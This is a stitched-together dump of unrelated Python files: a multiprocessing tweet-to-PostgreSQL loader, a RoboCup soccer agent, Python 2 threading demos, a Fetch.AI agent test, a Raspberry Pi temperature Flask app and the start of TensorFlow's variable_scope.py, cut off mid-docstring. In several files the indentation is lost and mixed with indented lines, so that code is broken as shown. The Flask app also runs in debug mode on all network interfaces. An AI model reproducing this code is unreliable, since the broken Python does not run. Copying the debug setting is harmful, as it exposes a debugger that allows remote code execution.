multithread_controller.py
|
import argparse
import multiprocessing
import os
import queue
import time
import psycopg2
import worker
import consts
lock = multiprocessing.Lock()
class Controller:
def __init__(self, archive_path, words):
self._archive_path = archive_path
self._words = words
self._task_size = 4
self._n_files_done = multiprocessing.Value('i', 0)
self._total_files = 0
for _, _, files in os.walk(self._archive_path):
for file in files:
if file.endswith("bz2"):
self._total_files += 1
def _worker(self, task_queue, lock):
DBworker = worker.Worker(self._words, lock)
        while True:
            try:
                # empty()/get() is racy across processes, so fetch without
                # blocking and stop once the queue has been drained.
                crt_task = task_queue.get_nowait()
            except queue.Empty:
                break
            DBworker.json_to_db(crt_task)
            with self._n_files_done.get_lock():
                # The final chunk may contain fewer than _task_size files,
                # so count the files actually processed.
                self._n_files_done.value += len(crt_task)
                line_end = '\r' if self._n_files_done.value < self._total_files else '\n'
                print("Files done: " + str(self._n_files_done.value) +
                      " out of " + str(self._total_files),
                      end=line_end)
DBworker.finalise()
def _populate_tasks(self, task_queue):
all_files = []
for root, dirs, files in os.walk(self._archive_path):
for file in files:
if file.endswith("bz2"):
all_files.append(os.path.join(root, file))
for idx in range(0, len(all_files), self._task_size):
task_queue.put(all_files[idx:idx + self._task_size])
return task_queue
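    # Illustrative note: with _task_size = 4 and six archives a.bz2 ... f.bz2,
    # the queue receives two tasks, [a.bz2, b.bz2, c.bz2, d.bz2] and
    # [e.bz2, f.bz2], so workers always pull whole chunks of file paths.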
    @staticmethod
    def _setup_database():
        connection = None
        try:
            # Establish connection
            connection = psycopg2.connect(**consts.db_creds)
            cursor = connection.cursor()
            # Recreate the tweets table from scratch
            cursor.execute('''DROP TABLE IF EXISTS tweets''')
            create_table_query = ''' CREATE TABLE tweets
                  (ID SERIAL PRIMARY KEY,
                  created_at TIMESTAMP NOT NULL,
                  text TEXT NOT NULL,
                  usr VARCHAR (255) NOT NULL,
                  twid VARCHAR (255) NOT NULL,
                  md5_hash VARCHAR (255) NOT NULL,
                  rt_status BOOLEAN NOT NULL,
                  screen_name VARCHAR(55) NOT NULL,
                  retweet_text TEXT);
                  '''
            index_query = "CREATE INDEX created_at_index ON tweets (created_at);"
            cursor.execute(create_table_query)
            cursor.execute(index_query)
            # Commit all schema changes at once
            connection.commit()
        except psycopg2.Error as error:
            print("Error while connecting to PostgreSQL", error)
        finally:
            # Close the connection (and its cursor) if it was opened
            if connection is not None:
                connection.close()
    @staticmethod
    def _create_indexes():
        connection = None
        try:
            # Establish connection
            connection = psycopg2.connect(**consts.db_creds)
            cursor = connection.cursor()
            text_index = ''' CREATE INDEX text_index ON tweets
                             USING hash (text); '''
            cursor.execute(text_index)
            # Commit the index creation
            connection.commit()
        except psycopg2.Error as error:
            print("Error while connecting to PostgreSQL", error)
        finally:
            # Close the connection (and its cursor) if it was opened
            if connection is not None:
                connection.close()
def run(self):
self._setup_database()
empty_task_queue = multiprocessing.Queue()
full_task_queue = self._populate_tasks(empty_task_queue)
processes = []
n_processes = multiprocessing.cpu_count()
print(f'Running with {n_processes} processes!')
start = time.time()
for w in range(n_processes):
p = multiprocessing.Process(
target=self._worker, args=(full_task_queue, lock))
processes.append(p)
p.start()
for p in processes:
p.join()
print('Creating indexes')
self._create_indexes()
print(f'Time taken = {time.time() - start:.10f}')
for p in processes:
p.close()
def main():
parser = argparse.ArgumentParser(description='Create DB from tweets')
    parser.add_argument('-a', required=True, help='Path to the archive')
parser.add_argument('words', metavar='W', type=str, nargs='*',
help='Words used for filtering')
args = parser.parse_args()
path = args.a
words = args.words
if words is None:
words = []
runner = Controller(path, words)
print("Started job")
runner.run()
print("\nFinished job")
if __name__ == "__main__":
main()
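# Usage sketch (hedged): assumes a directory tree of *.bz2 tweet archives and
# a consts.db_creds dict holding psycopg2 connection parameters, both provided
# by the surrounding project:
#
#   python multithread_controller.py -a /path/to/archives flood storm
#
# One worker process per CPU core drains the shared task queue, loading each
# chunk of files via worker.Worker.json_to_db(); the created_at index is built
# up front and the text index once every process has joined.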
|
agent.py
|
#!/usr/bin/env python
import threading
import time
import random
import sock
import sp_exceptions
import handler
from world_model import WorldModel
class Agent:
def __init__(self):
# whether we're connected to a server yet or not
self.__connected = False
# set all variables and important objects to appropriate values for
# pre-connect state.
# the socket used to communicate with the server
self.__sock = None
# models and the message handler for parsing and storing information
self.wm = None
self.msg_handler = None
# parse thread and control variable
self.__parsing = False
self.__msg_thread = None
self.__thinking = False # think thread and control variable
self.__think_thread = None
# whether we should run the think method
self.__should_think_on_data = False
# whether we should send commands
self.__send_commands = False
        # own goal position
self.goal_pos = None
def connect(self, host, port, teamname, version=11):
"""
Gives us a connection to the server as one player on a team. This
immediately connects the agent to the server and starts receiving and
parsing the information it sends.
"""
# if already connected, raise an error since user may have wanted to
# connect again to a different server.
if self.__connected:
msg = "Cannot connect while already connected, disconnect first."
raise sp_exceptions.AgentConnectionStateError(msg)
# the pipe through which all of our communication takes place
self.__sock = sock.Socket(host, port)
# our models of the world and our body
self.wm = WorldModel(handler.ActionHandler(self.__sock))
# set the team name of the world model to the given name
self.wm.teamname = teamname
# handles all messages received from the server
self.msg_handler = handler.MessageHandler(self.wm)
# set up our threaded message receiving system
self.__parsing = True # tell thread that we're currently running
self.__msg_thread = threading.Thread(target=self.__message_loop,
name="message_loop")
self.__msg_thread.daemon = True # dies when parent thread dies
# start processing received messages. this will catch the initial server
# response and all subsequent communication.
self.__msg_thread.start()
# send the init message and allow the message handler to handle further
# responses.
init_address = self.__sock.address
init_msg = "(init %s (version %d))"
self.__sock.send(init_msg % (teamname, version))
# wait until the socket receives a response from the server and gets its
# assigned port.
while self.__sock.address == init_address:
time.sleep(0.0001)
# create our thinking thread. this will perform the actions necessary
# to play a game of robo-soccer.
self.__thinking = False
self.__think_thread = threading.Thread(target=self.__think_loop,
name="think_loop")
self.__think_thread.daemon = True
# set connected state. done last to prevent state inconsistency if
# something goes wrong beforehand.
self.__connected = True
def play(self):
"""
Kicks off the thread that does the agent's thinking, allowing it to play
during the game. Throws an exception if called while the agent is
already playing.
"""
# ensure we're connected before doing anything
if not self.__connected:
msg = "Must be connected to a server to begin play."
raise sp_exceptions.AgentConnectionStateError(msg)
# throw exception if called while thread is already running
if self.__thinking:
raise sp_exceptions.AgentAlreadyPlayingError(
"Agent is already playing.")
        # run the method that sets up the agent's persistent variables
self.setup_environment()
# tell the thread that it should be running, then start it
self.__thinking = True
self.__should_think_on_data = True
self.__think_thread.start()
def disconnect(self):
"""
Tell the loop threads to stop and signal the server that we're
disconnecting, then join the loop threads and destroy all our inner
methods.
        Since the message loop thread can conceivably block indefinitely while
waiting for the server to respond, we only allow it (and the think loop
for good measure) a short time to finish before simply giving up.
Once an agent has been disconnected, it is 'dead' and cannot be used
again. All of its methods get replaced by a method that raises an
exception every time it is called.
"""
# don't do anything if not connected
if not self.__connected:
return
# tell the loops to terminate
self.__parsing = False
self.__thinking = False
# tell the server that we're quitting
self.__sock.send("(bye)")
        # tell our threads to join, but only wait briefly for them to do so.
# don't join them if they haven't been started (this can happen if
# disconnect is called very quickly after connect).
if self.__msg_thread.is_alive():
self.__msg_thread.join(0.01)
if self.__think_thread.is_alive():
self.__think_thread.join(0.01)
# reset all standard variables in this object. self.__connected gets
# reset here, along with all other non-user defined internal variables.
Agent.__init__(self)
def __message_loop(self):
"""
Handles messages received from the server.
This SHOULD NOT be called externally, since it's used as a threaded loop
internally by this object. Calling it externally is a BAD THING!
"""
# loop until we're told to stop
while self.__parsing:
# receive message data from the server and pass it along to the
# world model as-is. the world model parses it and stores it within
# itself for perusal at our leisure.
raw_msg = self.__sock.recv()
msg_type = self.msg_handler.handle_message(raw_msg)
# we send commands all at once every cycle, ie. whenever a
# 'sense_body' command is received
if msg_type == handler.ActionHandler.CommandType.SENSE_BODY:
self.__send_commands = True
# flag new data as needing the think loop's attention
self.__should_think_on_data = True
def __think_loop(self):
"""
Performs world model analysis and sends appropriate commands to the
server to allow the agent to participate in the current game.
Like the message loop, this SHOULD NOT be called externally. Use the
play method to start play, and the disconnect method to end it.
"""
while self.__thinking:
# tell the ActionHandler to send its enqueued messages if it is time
if self.__send_commands:
self.__send_commands = False
self.wm.ah.send_commands()
# only think if new data has arrived
if self.__should_think_on_data:
# flag that data has been processed. this shouldn't be a race
# condition, since the only change would be to make it True
# before changing it to False again, and we're already going to
# process data, so it doesn't make any difference.
self.__should_think_on_data = False
# performs the actions necessary for the agent to play soccer
self.think()
else:
# prevent from burning up all the cpu time while waiting for data
time.sleep(0.0001)
def setup_environment(self):
"""
Called before the think loop starts, this allows the user to store any
variables/objects they'll want access to across subsequent calls to the
think method.
"""
self.in_kick_off_formation = False
def player1(self):
        # play: determine the enemy goal position and push towards it
        goal_pos = (-55, 0) if self.wm.side == WorldModel.SIDE_R else (55, 0)
self.wm.ah.dash(50)
self.wm.turn_body_to_point(goal_pos)
self.wm.ah.dash(50)
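    # Sketch of an additional role (hedged, commented out): a simple
    # ball-chaser built only from calls already used in this file
    # (wm.ball, wm.ah.turn, wm.ah.dash, wm.is_ball_kickable, wm.kick_to).
    #
    # def chase_ball(self):
    #     if self.wm.ball is None or self.wm.ball.direction is None:
    #         self.wm.ah.turn(30)            # scan for the ball
    #     elif self.wm.is_ball_kickable():
    #         self.wm.kick_to((55, 0), 1.0)  # assumed target: enemy goal
    #     elif -7 <= self.wm.ball.direction <= 7:
    #         self.wm.ah.dash(65)            # ball roughly ahead, run at it
    #     else:
    #         self.wm.ah.turn(self.wm.ball.direction / 2)  # face the ball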
    def player2(self):
        # play: no behaviour implemented yet
        pass
    def player3(self):
        # play: no behaviour implemented yet
        pass
    def player4(self):
        # play: no behaviour implemented yet
        pass
    def player5(self):
        # play: no behaviour implemented yet
        pass
    def player6(self):
        # play: no behaviour implemented yet
        pass
    def player7(self):
        # play: no behaviour implemented yet
        pass
    def player8(self):
        # play: no behaviour implemented yet
        pass
def player9(self):
        # play: striker
        # determine the enemy goal position
        enemy_goal_pos = (55, 0) if self.wm.side != WorldModel.SIDE_R else (-55, 0)
# find the ball
if self.wm.ball is None or self.wm.ball.direction is None:
self.wm.ah.turn(30)
return
# kick it at the enemy goal
if self.wm.is_ball_kickable():
self.wm.turn_body_to_point(enemy_goal_pos)
self.wm.align_neck_with_body()
self.wm.kick_to(enemy_goal_pos, 1.0)
return
else:
# move towards ball
if -7 <= self.wm.ball.direction <= 7:
self.wm.ah.dash(65)
else:
# face ball
self.wm.ah.turn(self.wm.ball.direction / 2)
return
def player10(self):
self.player9()
def player11(self):
self.player9()
def think(self):
"""
Performs a single step of thinking for our agent. Gets called on every
iteration of our think loop.
"""
# DEBUG: tells us if a thread dies
if not self.__think_thread.is_alive() or not self.__msg_thread.is_alive():
raise Exception("A thread died.")
# take places on the field by uniform number
if not self.in_kick_off_formation:
# used to flip x coords for other side
side_mod = 1
#if self.wm.side == WorldModel.SIDE_R:
# side_mod = 1
if self.wm.uniform_number == 1:
self.wm.teleport_to_point((-50 * side_mod, 0))
elif self.wm.uniform_number == 2:
self.wm.teleport_to_point((-40 * side_mod, 15))
elif self.wm.uniform_number == 3:
self.wm.teleport_to_point((-40 * side_mod, 00))
elif self.wm.uniform_number == 4:
self.wm.teleport_to_point((-40 * side_mod, -15))
elif self.wm.uniform_number == 5:
self.wm.teleport_to_point((-5 * side_mod, -30))
elif self.wm.uniform_number == 6:
self.wm.teleport_to_point((-20 * side_mod, 20))
elif self.wm.uniform_number == 7:
self.wm.teleport_to_point((-20 * side_mod, 0))
elif self.wm.uniform_number == 8:
self.wm.teleport_to_point((-20 * side_mod, -20))
elif self.wm.uniform_number == 9:
self.wm.teleport_to_point((-19 * side_mod, 0))
elif self.wm.uniform_number == 10:
self.wm.teleport_to_point((-19 * side_mod, 10))
elif self.wm.uniform_number == 11:
self.wm.teleport_to_point((-19 * side_mod, -10))
self.in_kick_off_formation = True
return
        # dispatch behaviour by uniform number
if self.wm.uniform_number == 1:
self.player1()
elif self.wm.uniform_number == 2:
self.player2()
elif self.wm.uniform_number == 3:
self.player3()
elif self.wm.uniform_number == 4:
self.player4()
elif self.wm.uniform_number == 5:
self.player5()
elif self.wm.uniform_number == 6:
self.player6()
elif self.wm.uniform_number == 7:
self.player7()
elif self.wm.uniform_number == 8:
self.player8()
elif self.wm.uniform_number == 9:
self.player9()
elif self.wm.uniform_number == 10:
self.player10()
elif self.wm.uniform_number == 11:
self.player11()
"""
# kick off!
if self.wm.is_before_kick_off():
# player 9 takes the kick off
if self.wm.uniform_number == 9:
if self.wm.is_ball_kickable():
# kick with 100% extra effort at enemy goal
self.wm.kick_to(goal_pos, 1.0)
else:
# move towards ball
if self.wm.ball is not None:
if (self.wm.ball.direction is not None and
-7 <= self.wm.ball.direction <= 7):
self.wm.ah.dash(50)
else:
self.wm.turn_body_to_point((0, 0))
# turn to ball if we can see it, else face the enemy goal
if self.wm.ball is not None:
self.wm.turn_neck_to_object(self.wm.ball)
return
# attack!
else:
# find the ball
if self.wm.ball is None or self.wm.ball.direction is None:
self.wm.ah.turn(30)
return
# kick it at the enemy goal
if self.wm.is_ball_kickable():
self.wm.kick_to(goal_pos, 1.0)
return
else:
# move towards ball
if -7 <= self.wm.ball.direction <= 7:
self.wm.ah.dash(65)
else:
# face ball
self.wm.ah.turn(self.wm.ball.direction / 2)
return
"""
if __name__ == "__main__":
import sys
import multiprocessing as mp
    # enforce correct number of arguments, print help otherwise
    if len(sys.argv) < 3:
        print("args: ./agent.py <team_name> <num_players>")
        sys.exit()
    def spawn_agent(team_name):
        """
        Used to run an agent in a separate physical process.
        """
        a = Agent()
        a.connect("localhost", 6000, team_name)
        a.play()
        # we wait until we're killed
        while 1:
            # we sleep for a good while since we can only exit if terminated.
            time.sleep(1)
    # spawn all agents as separate processes for maximum processing efficiency
    agentthreads = []
    for agent in range(min(11, int(sys.argv[2]))):
        print(" Spawning agent %d..." % agent)
        at = mp.Process(target=spawn_agent, args=(sys.argv[1],))
        at.daemon = True
        at.start()
        agentthreads.append(at)
    print("Spawned %d agents." % len(agentthreads))
    print()
    print("Playing soccer...")
    # wait until killed to terminate agent processes
    try:
        while 1:
            time.sleep(0.05)
    except KeyboardInterrupt:
        print()
        print("Killing agent threads...")
        # terminate all agent processes
        count = 0
        for at in agentthreads:
            print(" Terminating agent %d..." % count)
            at.terminate()
            count += 1
        print("Killed %d agent threads." % count)
        print()
        print("Exiting.")
        sys.exit()
|
threading_user.py
|
#!/usr/bin/env python
import threading
import time
import logging
def config_log():
numeric_level = getattr(logging, 'INFO', None) # TODO: Li Wei(cmd line support)
if not isinstance(numeric_level, int):
raise ValueError('Invalid log level')
logging.basicConfig(filename='water_army.log', level=numeric_level,
filemode='w', format=('%(asctime)s: '
'%(levelname)s: '
'%(module)s: '
'%(funcName)s(): '
'%(lineno)d:\t '
'%(message)s:'))
def test_Timer():
def hello():
print 'hello'
def world():
print 'world'
t = threading.Timer(1, hello)
t.start()
t = threading.Timer(1, world)
t.start()
def test_Thread_Object():
class tobj(object):
def __call__(self, msg, debug_info):
print msg
print debug_info
def tfun(msg, debug_info):
print threading.currentThread().name, 'Starting'
print msg
print debug_info
print threading.currentThread().name, 'End'
    class MyThread(threading.Thread):
        def __init__(self, group=None, target=None, name=None,
                     args=(), kwargs={}, verbose=None):
            super(MyThread, self).__init__(name=name, group=group)
            self.target = target
            self.args = args
            self.kwargs = kwargs
        def run(self):
            # unpack the stored positional and keyword arguments
            self.target(*self.args, **self.kwargs)
            print 'runrun'
            return
t = threading.Thread(target=tobj(), name='thread--1', args=('hello world',), kwargs={'debug_info':'hahaa',})
t.setDaemon(True)
t.start()
t.join()
t = threading.Thread(target=tfun, name='thread--2', args=('hello world',), kwargs={'debug_info':'hahaa',})
t.setDaemon(True)
t.start()
t.join()
t = MyThread(target=tfun, name='thread--3', args=('hello world',), kwargs={'debug_info':'hahaa',})
t.setDaemon(True)
t.start()
t.join()
def tfun1():
time.sleep(2)
logging.info('%s' % threading.currentThread().name)
print threading.currentThread().name
logging.info('%s' % 'exit tfun1')
print 'exit tfun1'
def tfun2():
print threading.currentThread().name
print 'Exiting tfun2'
def test_Daemon_Thread():
t = threading.Thread(name='daemon thread 1', target=tfun1)
t.setDaemon(True)
    print 'We will start daemon thread 1; it may not finish executing ' \
          'before the main thread finishes, even though the daemon thread is still alive'
t.start()
t = threading.Thread(name='daemon thread 2', target=tfun2)
t.setDaemon(True)
    print 'We will start daemon thread 2; the main thread will block until it finishes (join)'
t.start()
t.join()
def test_Event():
def wait_for_event(e):
print 'wait for event starting'
event_is_set = e.wait()
print 'event set: %s' % event_is_set
def wait_for_event_timeout(e, t):
while not e.isSet():
print 'wait for event timeout starting'
event_is_set = e.wait(t)
print 'event set: %s' % event_is_set
if event_is_set:
print 'processing event'
else:
print 'doing other work'
e = threading.Event()
t1 = threading.Thread(name='block',
target=wait_for_event, args=(e,))
t1.start()
t2 = threading.Thread(name='non-block',
target=wait_for_event_timeout, args=(e,2))
t2.setDaemon(True)
t2.start()
print 'waiting before calling event.set()'
time.sleep(4)
e.set()
print 'Event is set'
t2.join()
def test_Lock():
print 'See: http://www.doughellmann.com/PyMOTW/threading/'
def test_RLock():
lock = threading.Lock()
try:
print 'First try: ', lock.acquire()
print 'Second try: ', lock.acquire(0)
except Exception as inst:
print inst
lock = threading.RLock()
try:
print 'First try: ', lock.acquire()
print 'Second try: ', lock.acquire(False)
print 'Third try: ', lock.acquire(False)
except Exception as inst:
print inst
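    # Note: a plain Lock is not reentrant, so the second non-blocking acquire
    # returns False, while an RLock may be re-acquired by the owning thread,
    # so both extra tries return True (and must each be matched by a release).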
def loopfunc():
time.sleep(2)
print "hello world"
def test_Thread1():
t = threading.Thread(name='thread', target=loopfunc)
t.setDaemon(True)
t.start()
t.join()
print 'haha'
def test_thread_exception():
def call_exception_thread():
def tfun1():
a = 1
assert a != 1, 'a equals 1'
def tfun():
print 'tfun'
tfun1()
t = threading.Thread(name='thread', target=tfun)
t.start()
t.join()
try:
        print 'Note that one thread can\'t catch an exception thrown by another thread'
call_exception_thread()
except AssertionError as inst:
print inst
#test_thread_exception()
test_Thread1()
#test_Thread_Object()
#config_log()
#test_Daemon_Thread()
#test_Event()
#test_RLock()
|
test_agent.py
|
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2019 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This module contains the tests of the agent module."""
import time
from threading import Thread
from aea.agent import Agent, AgentState, Identity
from aea.configurations.base import PublicId
from aea.mail.base import InBox, OutBox
from packages.fetchai.connections.local.connection import LocalNode, OEFLocalConnection
class DummyAgent(Agent):
"""A dummy agent for testing."""
def __init__(self, *args, **kwargs):
"""Initialize the agent."""
super().__init__(*args, **kwargs)
def setup(self) -> None:
"""Set up the agent."""
pass
def act(self) -> None:
"""Act."""
pass
def react(self) -> None:
"""React to events."""
pass
def update(self) -> None:
"""Update the state of the agent."""
pass
def teardown(self) -> None:
"""Tear down the agent."""
pass
def test_run_agent():
"""Test that we can set up and then run the agent."""
with LocalNode() as node:
agent_name = "dummyagent"
agent_address = "some_address"
identity = Identity(agent_name, address=agent_address)
agent = DummyAgent(
identity,
[
OEFLocalConnection(
"mypbk", node, connection_id=PublicId("fetchai", "oef", "0.1.0")
)
],
)
assert agent.name == identity.name
assert (
agent.agent_state == AgentState.INITIATED
), "Agent state must be 'initiated'"
agent.multiplexer.connect()
assert (
agent.agent_state == AgentState.CONNECTED
), "Agent state must be 'connected'"
assert isinstance(agent.inbox, InBox)
assert isinstance(agent.outbox, OutBox)
agent_thread = Thread(target=agent.start)
agent_thread.start()
time.sleep(1.0)
try:
assert (
agent.agent_state == AgentState.RUNNING
), "Agent state must be 'running'"
finally:
agent.stop()
agent.multiplexer.disconnect()
agent_thread.join()
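# To run only this test (hedged; assumes the aea repository's pytest setup):
#   pytest test_agent.py::test_run_agent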
|
serialInput.py
|
#!/usr/bin/env python
from __future__ import print_function # In python 2.7
import sys
import serial
from flask import Flask, render_template
import time
from gpiozero import LED
import threading
app = Flask("appmain")
temp = 0
isCel = 0
isAlarm = 0
@app.route("/")
def appmain():
global temp
global isCel
global isAlarm
alarmFlag = 'ALARM: OFF'
if int(isAlarm) != 0:
alarmFlag = 'ALARM: ON'
if int(isCel) == 0:
if int(isAlarm) != 0 and temp > 25:
alarmFlag = 'ALARM: SOUNDING'
return render_template('alarm.html')
return render_template('index.html', var1 = temp, var2 = 'C', var3 = alarmFlag)
else:
if int(isAlarm) != 0 and temp > 77:
alarmFlag = 'ALARM: SOUNDING'
return render_template('alarm.html')
return render_template('index.html', var1 = temp, var2 = 'F', var3 = alarmFlag)
def serial_start(ser):
gpioPinsFirstNumber = [LED(x) for x in [5,6,13,19]]
secondPins = [LED(x) for x in [4,17,27,22]]
i = 0
while i < 100:
i += 1
global temp
global isCel
global isAlarm
isCel = ser.readline()
isAlarm = ser.readline()
temp = int(int(ser.readline()) * 0.2 + 8)
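        # Assumption inferred from the reads above: the attached device sends
        # three lines per cycle (Celsius/Fahrenheit flag, alarm flag, raw
        # reading), and the raw reading is rescaled into a temperature here.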
if int(isCel) == 0:
temp = int((temp - 32) // 1.8)
firstDigit = temp // 10
secondDigit = temp % 10
for pin in gpioPinsFirstNumber:
pin.on()
for pin in secondPins:
pin.on()
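        # The four pins per digit form a 4-bit binary output (pin order
        # 8, 4, 2, 1): every pin is switched on above, then the pins whose
        # bit should be 0 are switched off below. A more compact equivalent
        # (sketch only, not wired in):
        #   for bit, pin in zip((8, 4, 2, 1), gpioPinsFirstNumber):
        #       pin.on() if firstDigit & bit else pin.off()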
if firstDigit == 9:
gpioPinsFirstNumber[1].off()
gpioPinsFirstNumber[2].off()
elif firstDigit == 8:
gpioPinsFirstNumber[1].off()
gpioPinsFirstNumber[2].off()
gpioPinsFirstNumber[3].off()
elif firstDigit == 7:
gpioPinsFirstNumber[0].off()
elif firstDigit == 6:
gpioPinsFirstNumber[0].off()
gpioPinsFirstNumber[3].off()
elif firstDigit == 5:
gpioPinsFirstNumber[0].off()
gpioPinsFirstNumber[2].off()
elif firstDigit == 4:
gpioPinsFirstNumber[0].off()
gpioPinsFirstNumber[2].off()
gpioPinsFirstNumber[3].off()
elif firstDigit == 3:
gpioPinsFirstNumber[0].off()
gpioPinsFirstNumber[1].off()
elif firstDigit == 2:
gpioPinsFirstNumber[0].off()
gpioPinsFirstNumber[1].off()
gpioPinsFirstNumber[3].off()
elif firstDigit == 1:
gpioPinsFirstNumber[0].off()
gpioPinsFirstNumber[1].off()
gpioPinsFirstNumber[2].off()
else:
gpioPinsFirstNumber[0].off()
gpioPinsFirstNumber[1].off()
gpioPinsFirstNumber[2].off()
gpioPinsFirstNumber[3].off()
if secondDigit == 9:
secondPins[1].off()
secondPins[2].off()
elif secondDigit == 8:
secondPins[1].off()
secondPins[2].off()
secondPins[3].off()
elif secondDigit == 7:
secondPins[0].off()
elif secondDigit == 6:
secondPins[0].off()
secondPins[3].off()
elif secondDigit == 5:
secondPins[0].off()
secondPins[2].off()
elif secondDigit == 4:
secondPins[0].off()
secondPins[2].off()
secondPins[3].off()
elif secondDigit == 3:
secondPins[0].off()
secondPins[1].off()
elif secondDigit == 2:
secondPins[0].off()
secondPins[1].off()
secondPins[3].off()
elif secondDigit == 1:
secondPins[0].off()
secondPins[1].off()
secondPins[2].off()
else:
secondPins[0].off()
secondPins[1].off()
secondPins[2].off()
secondPins[3].off()
time.sleep(1.5)
if __name__ == "__main__" :
ser = serial.Serial("/dev/ttyUSB1", 9600, timeout=2)
thread = threading.Thread(target = serial_start, args = (ser, ) )
thread.start()
app.run(debug=True, host='0.0.0.0')
|
variable_scope.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A class to store named variables and a scope operator to manage sharing."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections as collections_lib
import copy
import enum # pylint: disable=g-bad-import-order
import functools
import sys
import threading
import traceback
import six
from six import iteritems
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.eager import context
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.util import deprecation
from tensorflow.python.util import function_utils
from tensorflow.python.util import tf_contextlib
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.tf_export import tf_export
__all__ = [
"AUTO_REUSE", "VariableScope", "get_variable_scope", "get_variable",
"get_local_variable", "variable_scope", "variable_op_scope",
"no_regularizer", "VariableSynchronization", "VariableAggregation"
]
class _PartitionInfo(object):
"""Holds partition info used by initializer functions.
"""
def __init__(self, full_shape, var_offset):
"""Constructor.
Args:
full_shape: Tuple or list of `int` indicating the full combined shape
of the partitioned variables.
var_offset: Tuple or list of `int` specifying offset of this partition
with respect to the full variable for each dimension.
Raises:
TypeError: If `full_shape` or `var_offset` is not a sequence.
ValueError: If `full_shape` or `var_offset` differ in length. If
`var_offset` exceeds `full_shape` in any dimension.
"""
if not isinstance(full_shape, collections_lib.Sequence) or isinstance(
full_shape, six.string_types):
raise TypeError(
"`full_shape` must be a sequence (like tuple or list) instead of " +
type(full_shape).__name__)
if not isinstance(var_offset, collections_lib.Sequence) or isinstance(
var_offset, six.string_types):
raise TypeError(
"`var_offset` must be a sequence (like tuple or list) instead of " +
type(var_offset).__name__)
if len(var_offset) != len(full_shape):
raise ValueError(
"Expected equal length, but `var_offset` is of length {} while "
"full_shape is of length {}.".format(
len(var_offset), len(full_shape)))
for i in xrange(len(full_shape)):
offset = var_offset[i]
shape = full_shape[i]
if offset < 0 or offset >= shape:
raise ValueError(
"Expected 0 <= offset < shape but found offset={}, shape={} for "
"var_offset={}, full_shape={}".format(offset, shape, var_offset,
full_shape))
self._full_shape = full_shape
self._var_offset = var_offset
@property
def full_shape(self):
return self._full_shape
@property
def var_offset(self):
return self._var_offset
def single_offset(self, shape):
"""Returns the offset when the variable is partitioned in at most one dim.
Args:
shape: Tuple or list of `int` indicating the shape of one specific
variable partition.
Returns:
`int` representing the offset in the dimension along which the variable is
partitioned. Returns 0 if the variable is not being partitioned.
Raises:
ValueError: Depending on self.single_slice_dim().
"""
single_slice_dim = self.single_slice_dim(shape)
# If this variable is not being partitioned at all, single_slice_dim() could
# return None.
if single_slice_dim is None:
return 0
return self.var_offset[single_slice_dim]
def single_slice_dim(self, shape):
"""Returns the slice dim when the variable is partitioned only in one dim.
Args:
shape: Tuple or list of `int` indicating the shape of one specific
variable partition.
Returns:
`int` representing the dimension that the variable is partitioned in, or
`None` if the variable doesn't seem to be partitioned at all.
Raises:
TypeError: If `shape` is not a sequence.
ValueError: If `shape` is not the same length as `self.full_shape`. If
the variable is partitioned in more than one dimension.
"""
if not isinstance(shape, collections_lib.Sequence) or isinstance(
shape, six.string_types):
raise TypeError(
"`shape` must be a sequence (like tuple or list) instead of " +
type(shape).__name__)
if len(shape) != len(self.full_shape):
raise ValueError(
"Expected equal length, but received shape={} of length {} while "
"self.full_shape={} is of length {}.".format(shape, len(
shape), self.full_shape, len(self.full_shape)))
for i in xrange(len(shape)):
if self.var_offset[i] + shape[i] > self.full_shape[i]:
raise ValueError(
"With self.var_offset={}, a partition of shape={} would exceed "
"self.full_shape={} in dimension {}.".format(
self.var_offset, shape, self.full_shape, i))
slice_dim = None
for i in xrange(len(shape)):
if shape[i] == self.full_shape[i]:
continue
if slice_dim is not None:
raise ValueError(
"Cannot use single_slice_dim() with shape={} and "
"self.full_shape={} since slice dim could be either dimension {} "
"or {}.".format(shape, self.full_shape, i, slice_dim))
slice_dim = i
return slice_dim
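  # Illustrative example: for full_shape=[10, 20] and var_offset=[0, 5], a
  # partition of shape [10, 5] yields single_slice_dim() == 1 and
  # single_offset() == 5, i.e. the variable is split only along dimension 1.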
class _ReuseMode(enum.Enum):
"""Mode for variable access within a variable scope."""
# Indicates that variables are to be fetched if they already exist or
# otherwise created.
AUTO_REUSE = 1
# TODO(alive): For TensorFlow 2.0, Deprecate True/False/None API in favor of
# enum values.
# REUSE_FALSE = 2
# REUSE_TRUE = 3
# TODO(apassos) remove these forwarding symbols.
VariableSynchronization = variables.VariableSynchronization # pylint: disable=invalid-name
VariableAggregation = variables.VariableAggregation # pylint: disable=invalid-name
AUTO_REUSE = _ReuseMode.AUTO_REUSE
tf_export(v1=["AUTO_REUSE"]).export_constant(__name__, "AUTO_REUSE")
AUTO_REUSE.__doc__ = """
When passed in as the value for the `reuse` flag, AUTO_REUSE indicates that
get_variable() should create the requested variable if it doesn't exist or, if
it does exist, simply return it.
"""
_DEFAULT_USE_RESOURCE = False
@tf_export(v1=["enable_resource_variables"])
def enable_resource_variables():
"""Creates resource variables by default.
Resource variables are improved versions of TensorFlow variables with a
well-defined memory model. Accessing a resource variable reads its value, and
all ops which access a specific read value of the variable are guaranteed to
see the same value for that tensor. Writes which happen after a read (by
